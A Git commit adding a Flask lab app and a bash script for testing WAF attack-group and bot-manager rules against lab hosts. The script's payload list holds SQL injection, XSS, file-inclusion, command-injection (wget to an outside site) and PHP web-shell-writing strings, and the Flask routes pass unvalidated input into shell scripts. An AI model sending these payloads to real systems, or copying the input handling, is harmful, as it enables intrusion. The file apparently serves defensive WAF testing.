akamai
/
origin33
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity

flask

This commit is contained in:
Sangmin Kim 2024-03-19 21:59:18 +09:00
parent bf2f7f91dd
commit e0a4535e49
10 changed files with 997 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

BIN
app/.DS_Store vendored
View File

Binary file not shown.

BIN
app/flask/.DS_Store vendored Normal file
View File

Binary file not shown.

69
app/flask/app.py Normal file
View File

@ -0,0 +1,69 @@
# This is the Flask app.py file that runs a web server and returns "Hello World"
from flask import Flask, request, render_template
import subprocess
app = Flask(__name__)
doc_root = '/root/origin-33/flask/scripts'
@app.route('/lab/bm',methods = ['GET'])
def bm():
return render_template('bm.html')
@app.route('/lab/ivm',methods = ['GET'])
def ivm():
return render_template('ivm.html')
@app.route('/lab/bm/run',methods = ['GET'])
def bm_run():
property = request.args.get('property')
property = str(property)
print(property)
script = f'{doc_root}/mychecker.sh'
args = ['-c', f'{doc_root}/bm.conf', property]
output = subprocess.check_output ([script] + args, shell=False)
output = output.decode('utf-8')
print (output)
output = output.splitlines()
return output
@app.route('/lab/ivm/generate',methods = ['GET'])
def ivm_generate_image():
property = request.args.get('property')
property = str(property)
print(property)
script = f"{doc_root}/generate.sh"
args = [property]
output = subprocess.check_output ([script] + args, shell=False)
output = output.decode('utf-8')
print (output)
output = output.splitlines()
return output
@app.route('/lab/ivm/replace_image',methods = ['GET'])
def ivm_replace_image():
property = request.args.get('property')
property = str(property)
print(property)
script = f"{doc_root}/replaceImage.sh"
args = [property]
output = subprocess.check_output ([script] + args, shell=False)
output = output.decode('utf-8')
print (output)
output = output.splitlines()
return output
@app.route('/lab/ivm/replace_video',methods = ['GET'])
def ivm_replace_video():
property = request.args.get('property')
property = str(property)
print(property)
script = f"{doc_root}/replaceVideo.sh"
args = [property]
output = subprocess.check_output ([script] + args, shell=False)
output = output.decode('utf-8')
print (output)
output = output.splitlines()
return output
if __name__ == '__main__':
app.run()

13
app/flask/scripts/bm.conf Normal file
View File

@ -0,0 +1,13 @@
#! /bin/bash
#
# For information about the configuration options use:
# ./checker.sh -m
#
# Format example:
# bms p GET https://www.akamai.com / krs-cmd
bms s GET http://$1.akamai-lab.com / aka-arb
bms s GET http://$1.akamai-lab.com / aka-seo
bms s GET http://$1.akamai-lab.com / aka-eco
bms s GET http://$1.akamai-lab.com / tra-ikb
bms s GET http://$1.akamai-lab.com / tra-hbt
bms s GET http://$1.akamai-lab.com / act-cok

10
app/flask/scripts/generate.sh Normal file
View File

@ -0,0 +1,10 @@
#! /bin/bash
cd /usr/share/nginx/html/learn
cp cream.png.bak $1_dog.png
echo cream > $1_dog.txt
echo $1'_newDog: cream'
cp globe.mp4.bak $1_video.mp4
echo globe > $1_video.txt
echo $1'_newVideo: globe'

555
app/flask/scripts/mychecker.sh Normal file
View File

@ -0,0 +1,555 @@
#! /bin/bash
function logo()
{
echo " _ _ "
echo " | | | | "
echo " ___| |__ ___ ___| | _____ _ __ "
echo " / __| '_ \ / _ \/ __| |/ / _ \ '__|"
echo "| (__| | | | __/ (__| < __/ | "
echo " \___|_| |_|\___|\___|_|\_\___|_| v1.0"
echo ""
}
function help()
{
logo
echo "Welcome! This script aims to ease the testing of WAF Application Controls, Bot Manager Standard and Bot Manager Premier"
echo "Please check the information below in order to configure the proper parameters."
echo
echo "checker.sh -c [<file>] -r [<reference>] -v -e -d -m"
echo ""
echo "-c Configuration file. Check default.conf inside 'conf' folder for more information or use the -m option"
echo ""
echo "Optional:"
echo "-r Identifier added to the referer header to filter in WSA."
echo "-v Verbose mode."
echo "-e Export results to a CSV file."
echo "-d Use DNS lookup instead of hard-coded Edge IPs (use with caution, resolvers could block your IP if too much tests)."
echo "-m Print manual."
echo ""
}
function helpconf()
{
logo
echo "This script reads a configuration file that uses the following 6 block of data per line:"
echo ""
echo "[type] [environment] [method] [URL] [path] [arguments(optional)]"
echo ""
echo "Examples:"
echo "atg p GET http://www.{akamaized domain}.com / krs-cmd"
echo "bms s GET http://www.{akamaized domain}.com / aka-arb"
echo "bmp p POST http://www.{akamaized domain}.com / foo=bar"
echo "man s GET http://www.{akamaized domain}.com /?foo=bar"
echo "man p POST http://www.{akamaized domain}.com / foo=bar"
echo ""
echo "Available options:"
echo "--------------------------------------------------------------------------------------"
echo "type The type of control that will be tested, options are:"
echo " atg -- WAF Attack Groups"
echo " bms -- Bot Manager Standard"
echo " bmp -- Bot Manager Premier"
echo " man -- Manual test"
echo "environment Destination of the request to be generated, options are:"
echo " s -- Staging environment"
echo " p -- Production environment"
echo "method Method expected on Akamai for the tested URL, options are: GET or POST"
echo "url URL to test, the protocol (http or https) needs to be used"
echo "path Path to test (use / if no specific path)"
echo "arguments For atg:"
echo " krs-cmd -- Command Injection"
echo " krs-xss -- Cross-Site Scripting"
echo " krs-dos -- DDOS"
echo " krs-iht -- Invalid HTTP"
echo " krs-php -- PHP Injection"
echo " krs-rfi -- Remote File Inclusion"
echo " krs-sql -- SQL Injection"
echo " krs-trj -- Trojan"
echo " aag-wat -- Web Attack Tool"
echo " aag-wpr -- Web Protocol Attack"
echo " aag-sql -- SQL Injection"
echo " aag-xss -- Cross-Site Scripting"
echo " aag-lfi -- Local File Inclusion"
echo " aag-rfi -- Remote File Inclusion"
echo " aag-cmi -- Command Injection"
echo " aag-wpl -- Web Platform Attack"
echo " penalty -- Penalty test (no attack)"
echo " For bms:"
echo " aka-arb -- Academic or Research Bots"
echo " aka-asc -- Automated Shopping Cart and Sniper Bots"
echo " aka-bib -- Business Intelligence Bots"
echo " aka-eco -- E-Commerce Search Engine Bots"
echo " aka-eag -- Enterprise Data Aggregator Bots"
echo " aka-fia -- Financial Account Aggregator Bots"
echo " aka-fis -- Financial Services Bots"
echo " aka-job -- Job Search Engine Bots"
echo " aka-mda -- Media or Entertainment Search Bots"
echo " aka-new -- News Aggregator Bots"
echo " aka-onl -- Online Advertising Bots"
echo " aka-rss -- RSS Feed Reader Bots"
echo " aka-seo -- SEO, Analytics or Marketing Bots"
echo " aka-sit -- Site Monitoring and Web Development Bots"
echo " aka-soc -- Social Media or Blog Bots"
echo " aka-war -- Web Archiver Bots"
echo " aka-wse -- Web Search Engine Bots"
echo " tra-ikb -- Impersonators of Known Bots"
echo " tra-dvf -- Development Frameworks"
echo " tra-htl -- HTTP Libraries"
echo " tra-wsl -- Web Services Libraries"
echo " tra-osc -- Open Source Crawlers/Scraping Platforms"
echo " tra-hbt -- Headless Browsers/Automation Tools"
echo " tra-dcb -- Declared Bots (Keyword Match)"
echo " tra-agc -- Aggressive Web Crawlers"
echo " tra-req -- Request Anomaly"
echo " act-cok -- Cookie Integrity Failed"
echo " For bmp:"
echo " List of body parameters used by the endpoint (if any)"
echo " For man:"
echo " If using POST, list of body parameters"
}
function readconfig
{
if [ $verbose -eq 1 ]; then echo -e "> reading configuration"; fi
while IFS=' ' read -ra line || [ -n "$line" ];
do
[[ "$line" =~ ^(#.*|^$)$ ]] && continue
for i in "${line[@]}"; do
test_string+=("$i")
done
if [ $verbose -eq 1 ]; then echo -e "> ${test_string[0]} ${test_string[1]} ${test_string[2]} ${test_string[3]} ${test_string[4]} ${test_string[5]}"; fi
test_string[3]='http://'$property'.akamai-lab.com'
# echo $test_string[3]
protocol=""
sleepsec=5
if [[ ${test_string[3]} =~ ^http:// ]];
then
host=${test_string[3]:7};
protocol=${test_string[3]:0:4};
fi
if [[ ${test_string[3]} =~ ^https:// ]];
then
host=${test_string[3]:8};
protocol=${test_string[3]:0:5};
fi
if [[ $host == '' ]]; then
echo "Oops... did't find any valid protocol."
exit
fi
env=""
if [[ ${test_string[1]} == 'p' ]]; then
env="Production"
if [[ $protocol == 'http' ]]; then resolve 1; fi
if [[ $protocol == 'https' ]]; then resolve 2; fi
elif [[ ${test_string[1]} == 's' ]]; then
env="Staging"
if [[ $protocol == 'http' ]]; then resolve 3; fi
if [[ $protocol == 'https' ]]; then resolve 4; fi
else
echo "Oops... not a valid environment."
exit
fi
test_string=()
if [ $verbose -eq 1 ]; then echo -e "> sleeping for 5 seconds..."; fi
sleep $sleepsec
done < "$filecnf"
}
function resolve()
{
xpass=0
if [[ $1 == 1 ]]; then
if [[ $PFIP == '' ]]; then
dig="dig +short $PFFQ | tail -n1"
PFIPi=$(eval $dig)
if [ $verbose -eq 1 ]; then echo -e "> DNS lookup performed [$PFIPi]"; fi
else
if ! [[ ${test_string[5]} =~ ^aag- || ${test_string[5]} = 'penalty' ]]; then xpass=1; else if [[ $PFIPi == '' ]]; then xpass=1; else xpass=0; fi; sleepsec=0; fi
if [[ $xpass == 1 ]]; then
iparray=(${PFIP//:/ })
PFIPi="${iparray[$RANDOM % ${#iparray[@]}]}"
fi
if [ $verbose -eq 1 ]; then echo -e "> Cache used [$PFIPi]"; fi
fi
curl $PFIPi
elif [[ $1 == 2 ]]; then
if [[ $PEIP == '' ]]; then
dig="dig +short $PEFQ | tail -n1"
PEIPi=$(eval $dig)
if [ $verbose -eq 1 ]; then echo -e "> DNS lookup performed [$PEIPi]"; fi
else
if ! [[ ${test_string[5]} =~ ^aag- || ${test_string[5]} = 'penalty' ]]; then xpass=1; else if [[ $PEIPi == '' ]]; then xpass=1; else xpass=0; fi; sleepsec=0; fi
if [[ $xpass == 1 ]]; then
iparray=(${PEIP//:/ })
PEIPi="${iparray[$RANDOM % ${#iparray[@]}]}"
fi
if [ $verbose -eq 1 ]; then echo -e "> Cache used [$PEIPi]"; fi
fi
curl $PEIPi
elif [[ $1 == 3 ]]; then
if [[ $SFIP == '' ]]; then
dig="dig +short $SFFQ | tail -n1"
SFIPi=$(eval $dig)
if [ $verbose -eq 1 ]; then echo -e "> DNS lookup performed [$SFIPi]"; fi
else
if ! [[ ${test_string[5]} =~ ^aag- || ${test_string[5]} = 'penalty' ]]; then xpass=1; else if [[ $SFIPi == '' ]]; then xpass=1; else xpass=0; fi; sleepsec=0; fi
if [[ $xpass == 1 ]]; then
iparray=(${SFIP//:/ })
SFIPi="${iparray[$RANDOM % ${#iparray[@]}]}"
fi
if [ $verbose -eq 1 ]; then echo -e "> Cache used [$SFIPi]"; fi
fi
curl $SFIPi
elif [[ $1 == 4 ]]; then
if [[ $SEIP == '' ]]; then
dig="dig +short $SEFQ | tail -n1"
SEIPi=$(eval $dig)
if [ $verbose -eq 1 ]; then echo -e "> DNS lookup performed [$SEIPi]"; fi
else
if ! [[ ${test_string[5]} =~ ^aag- || ${test_string[5]} = 'penalty' ]]; then xpass=1; else if [[ $SEIPi == '' ]]; then xpass=1; else xpass=0; fi; sleepsec=0; fi
if [[ $xpass == 1 ]]; then
iparray=(${SEIP//:/ })
SEIPi="${iparray[$RANDOM % ${#iparray[@]}]}"
fi
if [ $verbose -eq 1 ]; then echo -e "> Cache used [$SEIPi]"; fi
fi
curl $SEIPi
fi
}
function exportcsv()
{
if [ $verbose -eq 1 ]; then echo -e "> exporting .csv"; fi
export_payload=""
export_type=""
for i in ${!ACRONYMA[@]}; do
if [[ ${test_string[5]} == ${ACRONYMA[$i]} ]]; then export_payload=${ACRONYMB[$i]}; fi
if [[ ${test_string[0]} == ${ACRONYMA[$i]} ]]; then export_type=${ACRONYMB[$i]}; fi
done
if [[ ${test_string[0]} == 'bmp' ]]; then export_payload=${test_string[5]}; fi
echo "${env},${http},${epoch},${refe},$export_type,$export_payload,${URL}" >> "$(basename ${filecnf})_${filetim}.csv"
}
function payload
{
PARAMHOLDER="?id=1"
HEADERHOLDER1=""
HEADERHOLDER2=""
HEADERHOLDER3=""
rules=(${1//:/ })
for i in ${!rules[@]}; do
case ${rules[$i]} in
"950002") PARAMHOLDER+="&p=powershell.exe"; ;;
"950006") PARAMHOLDER+="&p=chmod.40%2B1x.traceroute"; ;;
"950011") PARAMHOLDER+="&p=%3C%21--%23printenv"; ;;
"950103") HEADERHOLDER1+="p: ..%2F..%2F..%2F..%2F"; ;;
"950907") PARAMHOLDER+="&p=wget"; ;;
"3000005") PARAMHOLDER+="&p=%2Fsbin%2Fping"; ;;
"3000007") PARAMHOLDER+="&p=%3B+head+%2Fusr%2Ftemp+%3E+my.f"; ;;
"3000012") PARAMHOLDER+="&p=action%3Anew+java."; ;;
"3000013") PARAMHOLDER+="&p=wget+https%3A%2F%2Fmy.site"; ;;
"3000014") PARAMHOLDER+="&p=%24%7B.openstream()."; ;;
"3000020") PARAMHOLDER+="&p=%2Fproc%2Fself%2Fenviron"; ;;
"3000023") PARAMHOLDER+="&class%5B%27classLoader%27%5D%5B%27resources%27%5D%5B%27dirContext%27%5D%5B%27docBase%27%5D%3D%2F%2F192.168.18.1%2Ffile.do"; ;;
"3000025") PARAMHOLDER+="&p=()%20%7B.4654"; ;;
"3000031") HEADERHOLDER2+="Range: 18446744073709551615"; ;;
"3000033") PARAMHOLDER+="&p=phar%3A%2F%2F%20zlib%3A%2F%2F%20glob%3A%2F%2F%20expect%3A%2F%2F%20jar%3A%2F%2F"; ;;
"3000034") PARAMHOLDER+="&p=Runtime.getRuntime("; ;;
"3000041") PARAMHOLDER+="&p=%24class.inspect(%20type.getruntime(freemarker.template.utility.execute"; ;;
"3000056") PARAMHOLDER+="&p=o%3A5%3A%5C%22456%5C%22%3A546%3A%7Ba%3B%7D"; ;;
"3000058") PARAMHOLDER+="&p=action%3A%24%7B"; ;;
"3000065") H10="Content-Type: text/xml"; DATAHOLDER='<command>%3Ccommand%3Ejava.lang.processbuilder$nullinputstream\ncom.sun.xml.internal.ws.encoding.xml.xmlmessage$xmldatasource\njavax.crypto.cipherinputstream\njavax.crypto.nullcipher\n<classfactory>\njava.lang.processbuilder%24nullinputstream%5Cn%0Dcom.sun.xml.internal.ws.encoding.xml.xmlmessage%24xmldatasource%5Cn%0Djavax.crypto.cipherinputstream%5Cn%0Djavax.crypto.nullcipher%5Cn%0D%3Cclassfactory%3E'; ;;
"3000068") PARAMHOLDER+="&p=%3Cesi%3Ainclude"; ;;
"3000072") H10="Content-Type: application/octet-stream"; DATAHOLDER='*.exec(* *burpcollaborator* *ysoserial* *freddy?*http:*.20java.%2Fio%2Ffile%20java%2Flang%2Fruntime.123'; ;;
"950018") PARAMHOLDER+="&p=http%3A%2F%2Fwww.test.com%2Ftest.pdf%20x0d%23"; ;;
"958000") PARAMHOLDER+="&p=.addimport"; ;;
"958001") PARAMHOLDER+="&p=document.exitFullscreen%5D"; ;;
"958002") PARAMHOLDER+="&p=.execscript"; ;;
"958003") PARAMHOLDER+="&p=.fromcharcode"; ;;
"958004") PARAMHOLDER+="&p=.innerhtml"; ;;
"958005") PARAMHOLDER+="&p=%3C!%5Bcdata%5B"; ;;
"958006") PARAMHOLDER+="&p=%3Cbody%20background"; ;;
"958007") PARAMHOLDER+="&p=%3Cbody%20onload"; ;;
"958008") PARAMHOLDER+="&p=%3Cinput%20type%20image"; ;;
"958009") PARAMHOLDER+="&p=%40import"; ;;
"958010") PARAMHOLDER+="&p=activexobject"; ;;
"958011") PARAMHOLDER+="&p=background-image%3A"; ;;
"958012") PARAMHOLDER+="&p=copyparentfolder"; ;;
"958013") PARAMHOLDER+="&p=createtextrange"; ;;
"958016") PARAMHOLDER+="&p=getparentfolder"; ;;
"958017") PARAMHOLDER+="&p=getspecialfolder"; ;;
"958018") PARAMHOLDER+="&p=href%20javascript%3A"; ;;
"958019") PARAMHOLDER+="&p=href%20shell%3A"; ;;
"958020") PARAMHOLDER+="&p=href%20vbscript%3A"; ;;
"958022") PARAMHOLDER+="&p=livescript%3A"; ;;
"958023") PARAMHOLDER+="&p=lowsrc%20javascript%3A"; ;;
"958024") PARAMHOLDER+="&p=lowsrc%20shell%3A"; ;;
"958025") PARAMHOLDER+="&p=lowsrc%20vbscript%3A"; ;;
"958026") PARAMHOLDER+="&p=mocha%3A"; ;;
"958027") PARAMHOLDER+="&p=onabort"; ;;
"958028") PARAMHOLDER+="&p=settimeout%20("; ;;
"958030") PARAMHOLDER+="&p=src%20http%3A"; ;;
"958031") PARAMHOLDER+="&p=src%20javascript%3A"; ;;
"958032") PARAMHOLDER+="&p=src%20shell%3A"; ;;
"958033") PARAMHOLDER+="&p=src%20vbscript%3A"; ;;
"958034") PARAMHOLDER+="&p=style%3Dbexpression("; ;;
"958036") PARAMHOLDER+="&p=type%20application%20x-javascript"; ;;
"958037") PARAMHOLDER+="&p=type%20application%20x-vbscript"; ;;
"958038") PARAMHOLDER+="&p=type%20text%20ecmascript"; ;;
"958039") PARAMHOLDER+="&p=type%20text%20javascript"; ;;
"958040") PARAMHOLDER+="&p=type%20text%20jscript"; ;;
"958041") PARAMHOLDER+="&p=type%20text%20vbscript"; ;;
"958045") PARAMHOLDER+="&p=url%20javascript%3A"; ;;
"958046") PARAMHOLDER+="&p=url%20shell%3A"; ;;
"958047") PARAMHOLDER+="&p=url%20vbscript%3A"; ;;
"3000036") PARAMHOLDER+="&foo&msg=bar"; ;;
"950116") PARAMHOLDER="%ufF12/"; ;;
"950107") PARAMHOLDER="%00%!%u1234/?id=1"; ;;
"950108") H10="Content-Type: application/x-www-form-urlencoded;charset=test"; DATAHOLDER='%00%!%u1234/'; ;;
"950109") PARAMHOLDER+="&p=%2500%25!%25u1234"; ;;
"958230") HEADERHOLDER1="Range: 50-10 bytes=10-,10-,10-,10-,10-,"; ;;
"958231") HEADERHOLDER1="Range: bytes=10-,10-,10-,10-,10-,"; ;;
"958291") HEADERHOLDER1="Range: bytes=0-"; ;;
"958295") HEADERHOLDER1="Connection: keep-alive,close"; ;;
"960006") H9="User-Agent;"; ;;
"960007") H6="Host;"; ;;
"960008") H6="Host:"; ;;
"960009") H9="User-Agent:"; ;;
"960010") HEADERHOLDER1="Content-Type: application/x-www-checker"; ;;
"960011") HEADERHOLDER2="Content-Length: 1000"; ;;
"960012") HEADERHOLDER2="Content-Length:"; ;;
"960016") HEADERHOLDER2="Content-Length: checker"; ;;
"960022") HEADERHOLDER1="Expect: 100-continue"; PROTOCOLHOLDER="--http1.0"; ;;
"960034") PROTOCOLHOLDER="--httpX.X"; ;;
"960038") HEADERHOLDER1="Content-Range: test"; ;;
"960901") PARAMHOLDER+="&one=more"; ;;
"960902") HEADERHOLDER3="Content-Encoding: Identity"; ;;
"958976") PARAMHOLDER+="&current={pboot:if(eval\($_GET\['a'\]))}1{/pboot:if}&a=fputs(fopen(base64_decode('eC5waHA'),'w'),%20base64_decode('PD9waHAgQGV2YWwoJF9QT1NUWyd4YiddKTsgPz54YnNoZWxs'));"; ;;
"958977") PARAMHOLDER+="&p=allow_url_include%3D%20safe_mode%3D%20suhosin.simulation%3D%20disable_functions%3D%20open_basedir%3D%20auto_prepend_file%3D%20php%3A%2F%2Finput"; ;;
"959151") PARAMHOLDER+="&p=%3C%3F%3C%3F"; ;;
"3000003") PARAMHOLDER+="&p=base64_decode("; ;;
"3000016") PARAMHOLDER+="&p=data%3Atext%2Fplain%3Bbase64%2C"; ;;
"950117") PARAMHOLDER+="&p=https%3A%2F%2F123.123.123.123"; ;;
"950118") PARAMHOLDER+="&p=mosConfig_absolute_path=GALLERY_BASEDIR%3Dhttps%3A%2F%2F%5B%5E%5Cs%5D%2B"; ;;
"950119") PARAMHOLDER+="&p=https%3A%2F%2F${test_string[3]}%3F"; ;;
"950120") PARAMHOLDER+="&referer=GALLERY_BASEDIR%3Dhttps%3A%2F%2F%5B%5E%5Cs%5D%2B"; ;;
"950001") PARAMHOLDER+="&p=dbms_java"; ;;
"950007") PARAMHOLDER+="&p=attnotnull"; ;;
"950901") PARAMHOLDER+="&p=%22test%3C%3D%3E%22test"; ;;
"950908") PARAMHOLDER+="&p=coalesce"; ;;
"959070") PARAMHOLDER+="&p=create%20table%27%20statements%20(e.g.%20%27create%20table%20("; ;;
"959071") PARAMHOLDER+="&p=%27%20OR%20%27string%27%20%3C"; ;;
"959072") PARAMHOLDER+="&p=AND%20%27string%27%3D"; ;;
"959073") PARAMHOLDER+="&p=select%27...%27length%27...%27from%27%2C%20%27select%27...%27count%27...%27from%27%2C%20%27sp_sqlexec%27%2C%20%27group%27...%27by%27...%27having"; ;;
"981172") COOKIEHOLDER="p=%27...%27length%27...%27from%27%2C%20%27select%27...%27count%27...%27from%27%2C%20%27sp_sqlexec%27%2C%20%27group%27...%27"; ;;
"950110") HEADERHOLDER1="x_file: test"; ;;
"950921") PARAMHOLDER="/scri%E2%80%8Cpts/root.exe&/c+dir"; ;;
"watatomic") PARAMHOLDER="/bbscan-404-existence-check?id=1&msg=legion"; UAHOLDER+=" absinthe"; HEADERHOLDER1="acunetix-aspect: 1"; HEADERHOLDER2="nstealth_xss: nstealth_xss"; ;;
"wpratomic") HEADERHOLDER1="Content-Type: application/xml"; HEADERHOLDER2=" Transfer-Encoding: checker"; HEADERHOLDER3="Content-Length: chunked"; ;;
"sqlatomic") PARAMHOLDER+="&fakeparam=-1%20UNION%20ALL%20SELECT%20%40%40version%2C2%2C3--"; ;;
"xssatomic") PARAMHOLDER+="&fakeparam=%3Cscript%3Ewindow.alert(%221213%22)%3C%2Fscript%3E&f2=PHNjcmlwdD5hbGVyd"; ;;
"lfiatomic") PARAMHOLDER+="&fakeparam=.././.././../etc/passwd"; ;;
"rfiatomic") PARAMHOLDER+="&fakeparam=http://cirt.net/rfiinc.txt"; ;;
"cmiatomic") PARAMHOLDER+="&fakeparam=something;/bin/whoami"; ;;
"wplatomic") HEADERHOLDER1+="Range: 18446744073709551615"; ;;
*) PARAMHOLDER="" ; ;;
esac
done
}
function curl
{
shopt -s nocasematch
if [[ ${test_string[2]} =~ ^(GET|POST)?$ ]]; then
if [ $verbose -eq 1 ]; then echo -e "> using ${test_string[2]}"; fi
if ! [[ ${test_string[2]} =~ ^(GET)?$ ]]; then method="-X ${test_string[2]}"; else method=""; fi
COOKIEHOLDER=""
HEADERHOLDER1="Connection: keep-alive"
HEADERHOLDER2=""
PARAMHOLDER=""
PATHHOLDER=""
DATAHOLDER="{'foo':'bar'}"
UAHOLDER=""
PROTOCOLHOLDER="--http2"
if [ -z "$fileref" ]; then
epoch=$(date +%s);
else
epoch=$fileref;
fi
H1="Accept: application/json"
H2="Accept-Encoding: gzip;q=1.0, compress;q=0.5"
H3="Accept-Language: en-US,en;q=1.0"
H4="Cache-Control: no-cache"
H5="Cookie: foo=bar;"
H6="Host: $host"
H7="Origin: ${test_string[3]}"
H8="Referer: $epoch"
H9="User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.122 Safari/537.36 opr/checker"
H10="Content-Type: text/plain"
if [ ${test_string[0]} = 'atg' ]; then
if [ $verbose -eq 1 ]; then echo -e "> Attack Group (atg) found"; fi
case ${test_string[5]} in
"krs-cmd") payload "950002:950006:950011:950103:950907:3000005";;
"krs-xss") payload "950018:958000:958001:958002:958003:958004:958005:958006:958007:958008:958009:958010:958011:958012:958013:958016:958017:958018:958019:958020:958022:958023:958024:958025:958026:958027:958028:958030:958031:958032:958033:958034:958036:958037:958038:958039:958040:958041:958045:958046:958047"; ;;
"krs-dos") payload "3000036"; ;;
"krs-iht") payload "950107:950108:950109:958291:958295:960010:960016:960022:960038:960901:960902"; ;;
"krs-php") payload "958976:958977:959151:3000003:3000016"; ;;
"krs-rfi") payload "950117:950118:950119:950120"; ;;
"krs-sql") payload "950001:950007:950901:950908:959070:959071:959072:959073:981172"; ;;
"krs-trj") payload "950110:950921"; ;;
"aag-wat") payload "watatomic"; ;;
"aag-wpr") payload "wpratomic"; ;;
"aag-sql") payload "sqlatomic"; ;;
"aag-xss") payload "xssatomic"; ;;
"aag-lfi") payload "lfiatomic"; ;;
"aag-rfi") payload "rfiatomic"; ;;
"aag-cmi") payload "cmiatomic"; ;;
"aag-wpl") payload "wplatomic"; ;;
"penalty") payload ""; ;;
*) echo -e 'Oops... invalid argument!'; exit; ;;
esac
elif [ ${test_string[0]} = 'bms' ]; then
if [ $verbose -eq 1 ]; then echo -e "> Bot Manager Standard (bms) found"; fi
case ${test_string[5]} in
"aka-arb") UAHOLDER+=" lightspeedsystems"; ;;
"aka-asc") HEADERHOLDER1+="X-HONEY-BOT:Hi_HC_Aegah4luquud8ahVOchood5a"; ;;
"aka-bib") UAHOLDER+=" companybooknetworking.com"; ;;
"aka-eco") HEADERHOLDER1="X-HONEY-BOT:Hi_PC_uNeini4aphaiB1oiChoh1thi"; ;;
"aka-eag") UAHOLDER+=" shrinktheweb.com"; ;;
"aka-fia") UAHOLDER+=" (moneyforward)"; HEADERHOLDER1="X-MF-Tag:12345678"; ;;
"aka-fis") UAHOLDER+=" drwholdings.com"; ;;
"aka-job") UAHOLDER+=" motorelavoro.it"; ;;
"aka-mda") UAHOLDER+=" localconditions.com"; ;;
"aka-new") UAHOLDER+=" reader.aol.com"; ;;
"aka-onl") UAHOLDER+=" integralads.com"; ;;
"aka-rss") UAHOLDER+=" pocketcasts.com"; ;;
"aka-seo") UAHOLDER+=" terrykyleseoagency.com"; ;;
"aka-sit") HEADERHOLDER1="X-Abuse-Info: New Relic Synthetics Monitor"; ;;
"aka-soc") UAHOLDER+=" socialrank.io"; ;;
"aka-war") UAHOLDER+=" europarchive.org"; ;;
"aka-wse") UAHOLDER+=" femtosearch.com"; ;;
"tra-ikb") UAHOLDER+=" amazon route 53"; ;;
"tra-dvf") UAHOLDER+=" ruby microsoft atl native"; ;;
"tra-htl") UAHOLDER+=" winhttprequest"; ;;
"tra-wsl") UAHOLDER+=" httpful"; ;;
"tra-osc") UAHOLDER+=" mercury.postlight.com"; ;;
"tra-hbt") UAHOLDER+=" prerender"; ;;
"tra-dcb") UAHOLDER+=" semantic"; ;;
"tra-agc") UAHOLDER+=" openhose.org"; ;;
"tra-req") HEADERHOLDER1="Accept-Language: en"; UAHOLDER+=" mozilla./"; ;;
"act-cok") COOKIEHOLDER="ak_bmsc=foobar; bm_mi=foobar"; ;;
*) echo -e 'Oops... invalid argument!'; exit; ;;
esac
elif [ ${test_string[0]} = 'bmp' ]; then
if [ $verbose -eq 1 ]; then echo -e "> Bot Manager Premier (bmp) found"; fi
if [[ ${test_string[5]} != '' ]]; then
DATAHOLDER="${test_string[5]}"
fi
test_string[5]="BMP";
elif [ ${test_string[0]} = 'man' ]; then
if [ $verbose -eq 1 ]; then echo -e "> Manual test found"; fi
if [[ ${test_string[2]} =~ ^(POST)?$ ]]; then DATAHOLDER=${test_string[5]}; fi
test_string[5]="Manual";
else
if [ $verbose -eq 1 ]; then echo -e "> No type found"; fi
fi
description="";
if [ ${test_string[5]} = 'aka-arb' ]; then
description="Academic or Research Bots"
elif [ ${test_string[5]} = 'aka-seo' ]; then
description="SEO, Analytics or Marketing Bots"
elif [ ${test_string[5]} = 'aka-eco' ]; then
description='E-Commerce Search Engine Bots'
elif [ ${test_string[5]} = 'tra-ikb' ]; then
description='Impersonators of Known Bots'
elif [ ${test_string[5]} = 'tra-hbt' ]; then
description='Headless Browsers/Automation Tools'
elif [ ${test_string[5]} = 'act-cok' ]; then
description='Cookie Integrity Failed'
else
description='not equal';
fi
export now=$(date)
echo -e "\t $now : [ $env ] [ $description ]"
H9+=${UAHOLDER}
H5+=${COOKIEHOLDER}
URL="${test_string[3]}${test_string[4]}${PARAMHOLDER}"
CURL='/usr/bin/curl'
CURLARGS="-i -k -s -S -v -m 30 $method $PROTOCOLHOLDER --connect-to ::$1"
echo -e "${test_string[3]}${test_string[4]}"
if [[ ${test_string[2]} =~ ^(POST)?$ ]]; then
if [ $verbose -eq 1 ]; then echo -e "> using $CURL $CURLARGS \"$URL\" -H \"$H1\" -H \"$H2\" -H \"$H3\" -H \"$H4\" -H \"$H5\" -H \"$H6\" -H \"$H7\" -H \"$H8\" -H \"$H9\" -H \"Pragma: akamai-x-cache-on, akamai-x-cache-remote-on, akamai-x-check-cacheable, akamai-x-get-cache-key, akamai-x-get-extracted-values, akamai-x-get-nonces, akamai-x-get-ssl-client-session-id, akamai-x-get-true-cache-key, akamai-x-serial-no, akamai-x-get-request-id, akamai-x-request-trace, akamai-x--meta-trace, akama-xi-get-extracted-values\" -H \"$H10\" -H \"$HEADERHOLDER1\" -H \"$HEADERHOLDER2\" -H \"$HEADERHOLDER3\" --data-raw \"$DATAHOLDER\""; fi
$CURL $CURLARGS "$URL" -H "$H1" -H "$H2" -H "$H3" -H "$H4" -H "$H5" -H "$H6" -H "$H7" -H "$H8" -H "$H9" -H "Pragma: akamai-x-cache-on, akamai-x-cache-remote-on, akamai-x-check-cacheable, akamai-x-get-cache-key, akamai-x-get-extracted-values, akamai-x-get-nonces, akamai-x-get-ssl-client-session-id, akamai-x-get-true-cache-key, akamai-x-serial-no, akamai-x-get-request-id, akamai-x-request-trace, akamai-x--meta-trace, akama-xi-get-extracted-values" -H "$H10" -H "$HEADERHOLDER1" -H "$HEADERHOLDER2" -H "$HEADERHOLDER3" --data-raw "$DATAHOLDER" &> .temp
else
if [ $verbose -eq 1 ]; then echo -e "> using $CURL $CURLARGS \"$URL\" -H \"$H1\" -H \"$H2\" -H \"$H3\" -H \"$H4\" -H \"$H5\" -H \"$H6\" -H \"$H7\" -H \"$H8\" -H \"$H9\" -H \"Pragma: akamai-x-cache-on, akamai-x-cache-remote-on, akamai-x-check-cacheable, akamai-x-get-cache-key, akamai-x-get-extracted-values, akamai-x-get-nonces, akamai-x-get-ssl-client-session-id, akamai-x-get-true-cache-key, akamai-x-serial-no, akamai-x-get-request-id, akamai-x-request-trace, akamai-x--meta-trace, akama-xi-get-extracted-values\" -H \"$HEADERHOLDER1\" -H \"$HEADERHOLDER2\" -H \"$HEADERHOLDER3\""; fi
